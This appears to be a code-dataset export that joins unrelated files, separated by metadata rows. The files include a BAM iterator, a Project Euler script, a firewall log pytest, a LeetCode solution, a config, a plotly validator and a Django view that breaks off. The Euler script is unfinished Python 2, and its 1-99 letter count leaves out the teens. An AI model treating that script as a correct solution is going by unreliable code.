# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import itertools
# BAM flags as defined in the BAM specification
BAM_SUPPLEMENTARY_ALIGNMENT = 0x800
BAM_PCR_DUPLICATE = 0x400
BAM_QUALITY_CONTROL_FAILED = 0x200
BAM_SECONDARY_ALIGNMENT = 0x100
BAM_IS_LAST_SEGMENT = 0x80
BAM_IS_FIRST_SEGMENT = 0x40
BAM_NEXT_IS_REVERSED = 0x20
BAM_READ_IS_REVERSED = 0x10
BAM_NEXT_IS_UNMAPPED = 0x8
BAM_READ_IS_UNMAPPED = 0x4
BAM_PROPER_SEGMENTS = 0x2
BAM_SEGMENTED = 0x1
# Default filters when processing reads
EXCLUDED_FLAGS = (
BAM_SUPPLEMENTARY_ALIGNMENT
| BAM_PCR_DUPLICATE
| BAM_QUALITY_CONTROL_FAILED
| BAM_SECONDARY_ALIGNMENT
| BAM_READ_IS_UNMAPPED
)
class BAMRegionsIter:
"""Iterates over a BAM file, yield a separate iterator for each contig
in the BAM or region in the list of regions if these are species, which in
turn iterates over individual positions. This allows for the following
pattern when parsing BAM files:
for region in BAMRegionsIter(handle):
# Setup per region
for (position, records) in region:
# Setup per position
...
# Teardown per position
# Teardown per region
The list of regions given to the iterator is expected to be in BED-like
records (see e.g. paleomix.common.bedtools), with these properties:
- contig: Name of the contig in the BED file
- start: 0-based offset for the start of the region
- end: 1-based offset (i.e. past-the-end) of the region
- name: The name of the region
"""
def __init__(self, handle, regions=None, exclude_flags=EXCLUDED_FLAGS):
"""
- handle: BAM file handle (c.f. module 'pysam')
- regions: List of BED-like regions (see above)
"""
self._handle = handle
self._regions = regions
self._excluded = exclude_flags
def __iter__(self):
if self._regions:
for region in self._regions:
records = self._handle.fetch(region.contig, region.start, region.end)
records = self._filter(records)
tid = self._handle.gettid(region.contig)
yield _BAMRegion(tid, records, region.name, region.start, region.end)
else:
def _by_tid(record):
"""Group by reference ID."""
return record.tid
# Save a copy, as these are properties generated upon every access!
names = self._handle.references
lengths = self._handle.lengths
records = self._filter(self._handle)
records = itertools.groupby(records, key=_by_tid)
for (tid, items) in records:
if tid >= 0:
name = names[tid]
length = lengths[tid]
else:
name = length = None
yield _BAMRegion(tid, items, name, 0, length)
def _filter(self, records):
"""Filters records by flags, if 'exclude_flags' is set."""
if self._excluded:
pred = lambda record: not record.flag & self._excluded
return filter(pred, records)
return records
class _BAMRegion:
"""Implements iteration over sites in a BAM file. It is assumed that the
BAM file is sorted, and that the input records are from one contig.
"""
def __init__(self, tid, records, name, start, end):
self._records = records
self.tid = tid
self.name = name
self.start = start
self.end = end
def __iter__(self):
def _by_pos(record):
"""Group by position."""
return record.pos
for group in itertools.groupby(self._records, _by_pos):
yield group
|
[
"MikkelSch@gmail.com"
] |
MikkelSch@gmail.com
|
92ffd6bc7322742b3d8da89f9f43fec5692453de
|
4554fcb85e4c8c33a5b5e68ab9f16c580afcab41
|
/projecteuler/test_xiaobai_17.py
|
d9b6678e2bc92bba87fc83a8f6d9bb16ee3c82a9
|
[] |
no_license
|
xshen1122/Follow_Huang_Python
|
12f4cebd8ddbc241a1c32cfa16288f059b530557
|
fcea6d1361aa768fb286e1ef4a22d5c4d0026667
|
refs/heads/master
| 2021-01-01T04:37:31.081142
| 2017-12-05T07:31:34
| 2017-12-05T07:31:34
| 97,211,313
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,630
|
py
|
# test_xiaobai_17.py
# coding: utf-8
'''
If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?
'''
def getLetter(yourlist):
ss=''
for item in yourlist:
ss += item
return len(ss)
def getList(yourlist):
for item in one_digit[:-1]:
yourlist.append(yourlist[0]+item)
return yourlist
if __name__ == '__main__':
one_digit = ['one','two','three','four','five','six','seven','eight','nine','ten']
teenage_digit = ['eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']
twenty_digit = ['twenty']
thirty_digit = ['thirty']
forty_digit = ['forty']
fifty_digit = ['fifty']
sixty_digit = ['sixty']
seventy_digit = ['seventy']
eighty_digit = ['eighty']
ninety_digit = ['ninety']
hundred_digit = ['hundredand']
letter_list = []
letter_list.append(getLetter(one_digit))
letter_list.append(getLetter(getList(twenty_digit)))
letter_list.append(getLetter(getList(thirty_digit)))
letter_list.append(getLetter(getList(forty_digit)))
letter_list.append(getLetter(getList(fifty_digit)))
letter_list.append(getLetter(getList(sixty_digit)))
letter_list.append(getLetter(getList(seventy_digit)))
letter_list.append(getLetter(getList(eighty_digit)))
letter_list.append(getLetter(getList(ninety_digit)))
result = 0
for item in letter_list:
result += item
print result # 1-99 has 787 letters
# 100 - 199 has ??
#以下就按100-199,200-299, 900-999,1000来计数即可
|
[
"xueqin.shen@outlook.com"
] |
xueqin.shen@outlook.com
|
db8694ebf7d5685301e2ad916517b43690b7ac20
|
e2e08d7c97398a42e6554f913ee27340226994d9
|
/pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_LOG/test_c142881.py
|
017398d281b068be2333be366936895d37d5e8d4
|
[] |
no_license
|
lizhuoya1111/Automated_testing_practice
|
88e7be512e831d279324ad710946232377fb4c01
|
b3a532d33ddeb8d01fff315bcd59b451befdef23
|
refs/heads/master
| 2022-12-04T08:19:29.806445
| 2020-08-14T03:51:20
| 2020-08-14T03:51:20
| 287,426,498
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,288
|
py
|
import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_log import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 142881
# 先产生安全日志 再删除
def test_c142881(browser):
try:
login_web(browser, url=dev1)
# 安全日志过滤级别改为all
edit_log_filter_lzy(browser, index="3", all='yes', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes/no', critical='yes/no', emerg='yes/no', alert="yes/no")
# IPMac绑定
add_ip_mac_binding_jyl(browser, ip="12.1.1.2", interface=interface_name_2, mac_add="auto_mac")
# 设置
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="enable",
policy_for_undefined_host="alert")
# 登录Dev2 修改2接口ip
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.2")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.3', mask='24')
# 82 ping 12.1.1.1
sleep(1)
diag_ping(browser, ipadd="12.1.1.1", interface=interface_name_2)
# 登录Dev1
sign_out_jyl(browser)
login_web(browser, url=dev1)
# 获取安全日志总数 不为0
num2 = get_log_counts_lzy(browser, log_type=安全日志)
print(num2)
# 删除安全日志
delete_log(browser, log_type=安全日志)
# 获取安全日志总数为0
num1 = get_log_counts_lzy(browser, log_type=安全日志)
print(num1)
# 获取管理日志
log1 = get_log(browser, 管理日志)
# 还原
# 还原安全日志过滤级别error critical alert emerg
edit_log_filter_lzy(browser, index="3", all='yes/no', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes', critical='yes', emerg='yes', alert="yes")
# 删除IPMac绑定
delete_ip_mac_banding_jyl(browser, ip="12.1.1.2")
# 恢复IPMac设置
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="disenable",
policy_for_undefined_host="allow")
# 82 接口2改IP
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.3")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.2', mask='24')
try:
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
|
[
"15501866985@163.com"
] |
15501866985@163.com
|
e917475fabe877dec477e34d78bf01e715efba8c
|
bcc199a7e71b97af6fbfd916d5a0e537369c04d9
|
/leetcode/solved/2568_Minimum_Fuel_Cost_to_Report_to_the_Capital/solution.py
|
ff61ddbb440902ec03f8f9a1b947035f18fde637
|
[] |
no_license
|
sungminoh/algorithms
|
9c647e82472905a2c4e505c810b622b734d9d20d
|
1389a009a02e90e8700a7a00e0b7f797c129cdf4
|
refs/heads/master
| 2023-05-01T23:12:53.372060
| 2023-04-24T06:34:12
| 2023-04-24T06:34:12
| 87,406,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,604
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <smoh2044@gmail.com>
#
# Distributed under terms of the MIT license.
"""
There is a tree (i.e., a connected, undirected graph with no cycles) structure country network consisting of n cities numbered from 0 to n - 1 and exactly n - 1 roads. The capital city is city 0. You are given a 2D integer array roads where roads[i] = [ai, bi] denotes that there exists a bidirectional road connecting cities ai and bi.
There is a meeting for the representatives of each city. The meeting is in the capital city.
There is a car in each city. You are given an integer seats that indicates the number of seats in each car.
A representative can use the car in their city to travel or change the car and ride with another representative. The cost of traveling between two cities is one liter of fuel.
Return the minimum number of liters of fuel to reach the capital city.
Example 1:
Input: roads = [[0,1],[0,2],[0,3]], seats = 5
Output: 3
Explanation:
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative2 goes directly to the capital with 1 liter of fuel.
- Representative3 goes directly to the capital with 1 liter of fuel.
It costs 3 liters of fuel at minimum.
It can be proven that 3 is the minimum number of liters of fuel needed.
Example 2:
Input: roads = [[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], seats = 2
Output: 7
Explanation:
- Representative2 goes directly to city 3 with 1 liter of fuel.
- Representative2 and representative3 go together to city 1 with 1 liter of fuel.
- Representative2 and representative3 go together to the capital with 1 liter of fuel.
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative5 goes directly to the capital with 1 liter of fuel.
- Representative6 goes directly to city 4 with 1 liter of fuel.
- Representative4 and representative6 go together to the capital with 1 liter of fuel.
It costs 7 liters of fuel at minimum.
It can be proven that 7 is the minimum number of liters of fuel needed.
Example 3:
Input: roads = [], seats = 1
Output: 0
Explanation: No representatives need to travel to the capital city.
Constraints:
1 <= n <= 105
roads.length == n - 1
roads[i].length == 2
0 <= ai, bi < n
ai != bi
roads represents a valid tree.
1 <= seats <= 105
"""
from typing import List
import pytest
import sys
class Solution:
    def minimumFuelCost(self, roads: List[List[int]], seats: int) -> int:
        """Mar 20, 2023 23:06

        Minimum litres of fuel for every representative to reach city 0.

        Key fact: the edge from a node to its parent is crossed by exactly
        ceil(subtree_size / seats) cars, where subtree_size is the number of
        representatives living at or below that node.  Summing this over all
        non-root nodes gives the answer directly.

        Implemented iteratively (BFS order, then reverse accumulation)
        because n can be up to 1e5 and a recursive DFS would exceed
        Python's default recursion limit on a path-shaped tree.
        """
        if not roads:
            return 0
        # Build an adjacency list for the undirected tree.
        graph = {}
        for a, b in roads:
            graph.setdefault(a, []).append(b)
            graph.setdefault(b, []).append(a)
        # BFS from the capital to get a parent-before-child ordering.
        order = [0]
        parent = {0: None}
        for node in order:  # appending to `order` while iterating is safe
            for nxt in graph.get(node, ()):
                if nxt not in parent:
                    parent[nxt] = node
                    order.append(nxt)
        # Accumulate subtree sizes children-first and add each edge's cost.
        size = {node: 1 for node in order}
        fuel = 0
        for node in reversed(order):
            p = parent[node]
            if p is not None:
                size[p] += size[node]
                # cars crossing the edge node -> p: ceil(size / seats)
                fuel += -(-size[node] // seats)
        return fuel
# Each tuple is (roads, seats, expected_fuel); the expected value is last.
@pytest.mark.parametrize('args', [
    (([[0,1],[0,2],[0,3]], 5, 3)),
    (([[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], 2, 7)),
    (([], 1, 0)),
])
def test(args):
    # Unpack: everything but the last element is input, the last is expected.
    assert args[-1] == Solution().minimumFuelCost(*args[:-1])
# Allow running this file directly: hand control to pytest.
if __name__ == '__main__':
    sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
[
"smoh2044@gmail.com"
] |
smoh2044@gmail.com
|
0f6959e8b0cceca7092c8b800527680ba1e71b99
|
2bc8f66fd34ba1b93de82c67954a10f8b300b07e
|
/general_backbone/configs/image_clf_config.py
|
278078f2ccad81f5d77ba37d852e540bba918d42
|
[] |
no_license
|
DoDucNhan/general_backbone
|
7dabffed5a74e622ba23bf275358ca2d09faddc1
|
686c92ab811221d594816207d86a0b97c9b4bc73
|
refs/heads/main
| 2023-08-31T14:59:23.873555
| 2021-10-23T06:34:14
| 2021-10-23T06:34:14
| 420,419,141
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,926
|
py
|
# Copyright (c) general_backbone. All rights reserved.
# --------------------Config for model training------------------------
train_conf = dict(
# General config
model='resnet18',
epochs=300,
start_epoch=0,
pretrained=True,
num_classes=2,
eval_metric='top1',
# Checkpoint
output='checkpoint/resnet50',
checkpoint_hist=10,
recovery_interval=10,
initial_checkpoint=None,
resume=None,
no_resume_opt=False,
# Logging
log_interval=50,
log_wandb=False,
local_rank=0,
# DataLoader
batch_size=16,
num_workers=8,
prefetch_factor=2,
pin_memory=True,
shuffle=True,
# Learning rate
lr=0.001,
lr_noise_pct=0.67,
lr_noise_std=1.0,
lr_cycle_mul=1.0,
lr_cycle_decay=0.1,
lr_cycle_limit=1.0,
sched='cosin',
min_lr=1e-6,
warmup_lr=0.0001,
warmup_epochs=5,
lr_k_decay=1.0,
decay_epochs=100,
decay_rate=0.1,
patience_epochs=10,
cooldown_epochs=10,
)
test_conf = dict(
# Data Loader
batch_size=16,
shuffle=False,
num_workers=8,
prefetch_factor=2,
pin_memory=True
)
# --------------------Config for Albumentation Transformation
# You can add to dict_transform a new Albumentation Transformation class with its argument and values:
# Learn about all Albumentation Transformations, refer to link: https://albumentations.ai/docs/getting_started/transforms_and_targets/
# Note: the order in the dictionary is matched with the processive order of transformations
data_root = 'toydata/image_classification'
img_size=224
data_conf=dict(
dict_transform=dict(
RandomResizedCrop={'width':256, 'height':256, 'scale':(0.9, 1.0), 'ratio':(0.9, 1.1), 'p':0.5},
ColorJitter={'brightness':0.35, 'contrast':0.5, 'saturation':0.5, 'hue':0.2, 'always_apply':False, 'p':0.5},
ShiftScaleRotate={'shift_limit':0.05, 'scale_limit':0.05, 'rotate_limit':15, 'p':0.5},
RGBShift={'r_shift_limit': 15, 'g_shift_limit': 15, 'b_shift_limit': 15, 'p': 0.5},
RandomBrightnessContrast={'p': 0.5},
Normalize={'mean':(0.485, 0.456, 0.406), 'std':(0.229, 0.224, 0.225)},
Resize={'height':img_size, 'width': img_size},
ToTensorV2={'always_apply':True}
),
class_2_idx=None, # Dictionary link class with indice. For example: {'dog':0, 'cat':1}, Take the folder name for label If None.
img_size=img_size,
data = dict(
train=dict(
data_dir=data_root,
name_split='train',
is_training=True,
debug=False, # If you want to debug Augumentation, turn into True
dir_debug = 'tmp/alb_img_debug', # Directory where to save Augmentation debug
shuffle=True
),
eval=dict(
data_dir=data_root,
name_split='test',
is_training=False,
shuffle=False
)
)
)
|
[
"phamdinhkhanh.tkt53.neu@gmail.com"
] |
phamdinhkhanh.tkt53.neu@gmail.com
|
5a380d07f579329852a0e83a874f250f2cbda60c
|
1c2c5240222e48cf6ed617378b23ce12c7f69231
|
/backend_pms/asgi.py
|
3b584ad3f8d2261c6920ecad850891f9d554084d
|
[] |
no_license
|
MayowaFunmi/pms_backend
|
5537d642a76ce18205f4a40a84a52c0ebfb24d5b
|
0ddc8a3718bf54dd5f30394ae18c70653634d79f
|
refs/heads/master
| 2023-02-06T23:26:15.429155
| 2021-01-02T14:39:06
| 2021-01-02T14:39:06
| 322,831,233
| 0
| 0
| null | 2021-01-02T13:30:05
| 2020-12-19T11:26:19
|
Python
|
UTF-8
|
Python
| false
| false
| 399
|
py
|
"""
ASGI config for backend_pms project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project settings unless the environment already did.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend_pms.settings')
# Module-level ASGI callable that servers (uvicorn/daphne) import.
application = get_asgi_application()
|
[
"akinade.mayowa@gmail.com"
] |
akinade.mayowa@gmail.com
|
bcd47c049189dca5af79f4d85687e6732a673dce
|
bfe5ab782ca4bb08433d70bdd142913d40a40a8d
|
/Codes/141) exercise27.py
|
57d04640fbaad4771a75ad7ddec47a0b9a69418c
|
[] |
no_license
|
akshat12000/Python-Run-And-Learn-Series
|
533099d110f774f3c322c2922e25fdb1441a6a55
|
34a28d6c29795041a5933bcaff9cce75a256df15
|
refs/heads/main
| 2023-02-12T19:20:21.007883
| 2021-01-10T05:08:09
| 2021-01-10T05:08:09
| 327,510,362
| 0
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 697
|
py
|
# Create a laptop class with attributes like brand name, model name, price
# Create two instance(object) of your laptop class
class Laptop:
    """A laptop described by its brand name, model name, and price."""

    def __init__(self, brand_name, model_name, price):
        # Store the constructor arguments as public attributes.
        self.brand_name = brand_name
        self.model_name = model_name
        self.price = price
        # Derived attribute "<brand> <model>" — instances may carry more
        # (or fewer) attributes than the constructor parameters.
        self.full_name = f"{brand_name} {model_name}"
# Demo: build two Laptop instances and print all their attributes.
l1=Laptop("HP","Pavilion",50000)
l2=Laptop("Dell","Inspiron",45000)
print(f"Brand Name: {l1.brand_name}, Model Name: {l1.model_name}, Price: {l1.price}, Full Name: {l1.full_name}")
print(f"Brand Name: {l2.brand_name}, Model Name: {l2.model_name}, Price: {l2.price}, Full Name: {l2.full_name}")
|
[
"noreply@github.com"
] |
akshat12000.noreply@github.com
|
6a63db375fbee64f04a063e3e15d6e9caff8ca94
|
0f20f3e02aa05b8e690190a96e92a524b211338f
|
/SW_Expert_Academy_02/String2.py
|
142a9ff2f4c33454b306be6657fae7ebaa14028b
|
[] |
no_license
|
HYEONAH-SONG/Algorithms
|
ec744b7e775a52ee0756cd5951185c30b09226d5
|
c74ab3ef21a728dcd03459788aab2859560367e6
|
refs/heads/master
| 2023-07-18T14:41:48.360182
| 2021-09-03T13:41:23
| 2021-09-03T13:41:23
| 336,240,949
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
# 문장을 구성하는 단어를 역순으로 출력하는 프로그램을 작성하라
# Read a sentence and print its words in reverse order.
words = input().split(' ')
# One space follows every word and no trailing newline is emitted,
# matching the original word-by-word printing exactly.
print(' '.join(reversed(words)), end=' ')
|
[
"sha082072@gmail.com"
] |
sha082072@gmail.com
|
3c6efd3975b2933f360fcc57fa1d1394bdbdbcc0
|
da8adef15efbdacda32b19196b391f63d5026e3a
|
/SistemasInteligentes/P4/main.py
|
e8b16e5345b6a927679fdea2c978a99fee08ce29
|
[] |
no_license
|
rubcuadra/MachineLearning
|
05da95c1f800e6acbce97f6ca825bd7a41d806a6
|
aa13dd007a7954d50586cca6dd413a04db18ef77
|
refs/heads/master
| 2021-03-19T17:33:14.080691
| 2018-10-19T23:43:27
| 2018-10-19T23:43:27
| 100,544,903
| 8
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,237
|
py
|
from reversi_player import Agent
from reversi import ReversiBoard
from random import shuffle
_agent2 = None
def P1Turn(board, player): #Player
    """Human player's turn: read the chosen cell from stdin and return it."""
    move = input('Enter your move: ')
    return move
def P2Turn(board, player): #IA
    """AI turn: delegate to the module-level agent's best-move search."""
    return _agent2.getBestMovement(board, player)
#Nivel => Profundidad de busqueda
#Fichas => 0 Blancas, 1 Negras (Para la computadora)
#Inicia => 0 Computadora, 1 Contrario
def othello(nivel, fichas=1, inicio=1):
    """Play a Reversi/Othello game between a human (P1) and the AI (P2).

    nivel: AI search depth.
    fichas: the computer's tokens -- 0 whites, 1 blacks.
    inicio: who moves first -- 0 the computer, 1 the opponent.
    """
    global _agent2
    _agent2 = Agent(nivel) # Create the AI agent for P2
    #P2 is the computer
    board = ReversiBoard()
    print("=== GAME STARTED ===")
    print(f"{board.P2S} = Blacks")
    print(f"{board.P1S} = Whites\n")
    print(board)
    # Decide move order and which token each side plays.
    if inicio == 1:
        order = ["P1","P2"]
        turns = [P1Turn,P2Turn]
        tokens = [board.P2,board.P1] if fichas == 0 else [board.P1,board.P2]
    else:
        order = ["P2","P1"]
        turns = [P2Turn,P1Turn]
        tokens = [board.P1,board.P2] if fichas == 0 else [board.P2,board.P1]
    while not ReversiBoard.isGameOver(board):
        for i in range(2):
            P1Score = board.score( board.P1 )
            P2Score = board.score( board.P2 )
            print("Scores:\t",f"{board.P1S}:{P1Score}","\t",f"{board.P2S}:{P2Score}")
            if board.canPlayerMove( tokens[i] ) :
                print(f"{order[i]} turn, throwing {board.getSymbol(tokens[i])}")
                # Re-prompt until a legal move (one that flips pieces) is made.
                # Each turn function receives a copy of the board state.
                while True:
                    move = turns[i]( ReversiBoard( board.value ) ,tokens[i])
                    if ReversiBoard.cellExists(move):
                        r = board.throw(tokens[i],move)
                        if len(r) > 0:
                            print(f"Selection: {move}")
                            board.doUpdate(tokens[i],r)
                            break
                    print("Wrong movement, try again")
                print(board)
    # NOTE(review): P1Score/P2Score are first bound inside the loop; if the
    # game were already over on entry this would raise NameError — confirm.
    if P1Score == P2Score: print("TIE !!")
    else: print(f"Winner is {board.P1S if P1Score>P2Score else board.P2S}")
if __name__ == '__main__':
    level = 2 # AI difficulty (search depth)
    npc = 0 # P2 (AI) tokens: 0 means whites
    starts = 1 # 0 => P2 (AI) starts
    othello(level,npc,starts)
|
[
"rubcuadra@gmail.com"
] |
rubcuadra@gmail.com
|
05423c174b31b915d1aa2e5c7e66eff20ca99cb2
|
735f4a6eb4e9c72dc664926ff8b42d02da9067f2
|
/batch_four/session-3/simple_file_creation.py
|
e0e87709ebb33e6df3d688ad5803ce85956fee80
|
[] |
no_license
|
sopanshewale/python-datascience
|
943b689d4264ad06f19c8039745ba6625d556282
|
0014b48d2397e16536731e1ee91e5e36f31e1ed9
|
refs/heads/master
| 2021-01-11T20:24:58.567677
| 2018-06-09T07:07:10
| 2018-06-09T07:07:10
| 79,097,836
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
#!/usr/bin/python3
# Write three pieces of text to simple_data.txt.
# NOTE: write() adds no newlines, so the three strings are concatenated
# on a single line — identical bytes to the original open/close version.
# The context manager guarantees the file is closed even on error.
with open('simple_data.txt', 'w') as f:
    f.write("Hello to writing data into file")
    f.write("Line ------2")
    f.write("Line ------3")
|
[
"sopan.shewale@gmail.com"
] |
sopan.shewale@gmail.com
|
08614e6d097655c7c676a0336d9f847227e88e3d
|
090a4e026addc9e78ed6118f09fd0d7d4d517857
|
/validators/funnel/_marker.py
|
475ac8c006ae087f0522dd87148fdf5d681678a6
|
[
"MIT"
] |
permissive
|
wwwidonja/new_plotly
|
0777365e53ea7d4b661880f1aa7859de19ed9b9a
|
1bda35a438539a97c84a3ab3952e95e8848467bd
|
refs/heads/master
| 2023-06-04T19:09:18.993538
| 2021-06-10T18:33:28
| 2021-06-10T18:33:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,407
|
py
|
import _plotly_utils.basevalidators
class MarkerValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="marker", parent_name="funnel", **kwargs):
super(MarkerValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Marker"),
data_docs=kwargs.pop(
"data_docs",
"""
autocolorscale
Determines whether the colorscale is a default
palette (`autocolorscale: true`) or the palette
determined by `marker.colorscale`. Has an
effect only if in `marker.color`is set to a
numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the
default palette will be chosen according to
whether numbers in the `color` array are all
positive, all negative or mixed.
cauto
Determines whether or not the color domain is
computed with respect to the input data (here
in `marker.color`) or the bounds set in
`marker.cmin` and `marker.cmax` Has an effect
only if in `marker.color`is set to a numerical
array. Defaults to `false` when `marker.cmin`
and `marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmin` must be set as well.
cmid
Sets the mid-point of the color domain by
scaling `marker.cmin` and/or `marker.cmax` to
be equidistant to this point. Has an effect
only if in `marker.color`is set to a numerical
array. Value should have the same units as in
`marker.color`. Has no effect when
`marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmax` must be set as well.
color
Sets themarkercolor. It accepts either a
specific color or an array of numbers that are
mapped to the colorscale relative to the max
and min values of the array or relative to
`marker.cmin` and `marker.cmax` if set.
coloraxis
Sets a reference to a shared color axis.
References to these shared color axes are
"coloraxis", "coloraxis2", "coloraxis3", etc.
Settings for these shared color axes are set in
the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple
color scales can be linked to the same color
axis.
colorbar
:class:`new_plotly.graph_objects.funnel.marker.Colo
rBar` instance or dict with compatible
properties
colorscale
Sets the colorscale. Has an effect only if in
`marker.color`is set to a numerical array. The
colorscale must be an array containing arrays
mapping a normalized value to an rgb, rgba,
hex, hsl, hsv, or named color string. At
minimum, a mapping for the lowest (0) and
highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in
color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may
be a palette name string of the following list:
Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,Reds,Bl
ues,Picnic,Rainbow,Portland,Jet,Hot,Blackbody,E
arth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
line
:class:`new_plotly.graph_objects.funnel.marker.Line
` instance or dict with compatible properties
opacity
Sets the opacity of the bars.
opacitysrc
Sets the source reference on Chart Studio Cloud
for opacity .
reversescale
Reverses the color mapping if true. Has an
effect only if in `marker.color`is set to a
numerical array. If true, `marker.cmin` will
correspond to the last color in the array and
`marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is
displayed for this trace. Has an effect only if
in `marker.color`is set to a numerical array.
""",
),
**kwargs
)
|
[
"wwwidonja@gmail.com"
] |
wwwidonja@gmail.com
|
ce4db0d1eefa29d48921b8c480811378e92db97a
|
b943d3c32cac2b4d9ab85753c0a611688fba82ad
|
/resume_parser/parser_app/views.py
|
3379793d2e341273319f0dea8815914b786cd1c5
|
[
"MIT"
] |
permissive
|
ashokraman/ResumeParser
|
787e0d5fdc560c35630c1a78411e28725812a737
|
2238b7f3ea955f04cf5ccda619a15f62fcf066e3
|
refs/heads/master
| 2020-06-20T13:16:49.115304
| 2019-07-04T05:38:26
| 2019-07-04T05:38:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,190
|
py
|
from django.shortcuts import render, redirect
from resume_parser import resume_parser
from .models import UserDetails, Competencies, MeasurableResults, Resume, ResumeDetails, UploadResumeModelForm
from django.contrib.auth.models import User
from django.contrib import messages
from django.conf import settings
from django.db import IntegrityError
from django.http import HttpResponse, FileResponse, Http404, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from .serializers import UserDetailsSerializer, CompetenciesSerializer, MeasurableResultsSerializer, ResumeSerializer, ResumeDetailsSerializer
import os
import requests
def homepage(request):
    """Upload view: on POST, wipe user 1's stored data, parse every uploaded
    resume, persist the extracted entities, and render a results page; on
    GET, render the empty upload form.

    NOTE(review): the user is hard-coded to id=1 (single-user demo), and
    `data` below is first bound inside the upload loop — a POST with no
    files or an invalid form would raise NameError at the score section.
    """
    if request.method == 'POST':
        # Start from a clean slate: delete everything previously stored
        # for the demo user before re-parsing the new uploads.
        user = User.objects.get(id=1)
        UserDetails.objects.filter(user=user).delete()
        Competencies.objects.filter(user=user).delete()
        MeasurableResults.objects.filter(user=user).delete()
        Resume.objects.filter(user=user).delete()
        ResumeDetails.objects.filter(resume__user=user).delete()
        file_form = UploadResumeModelForm(request.POST, request.FILES)
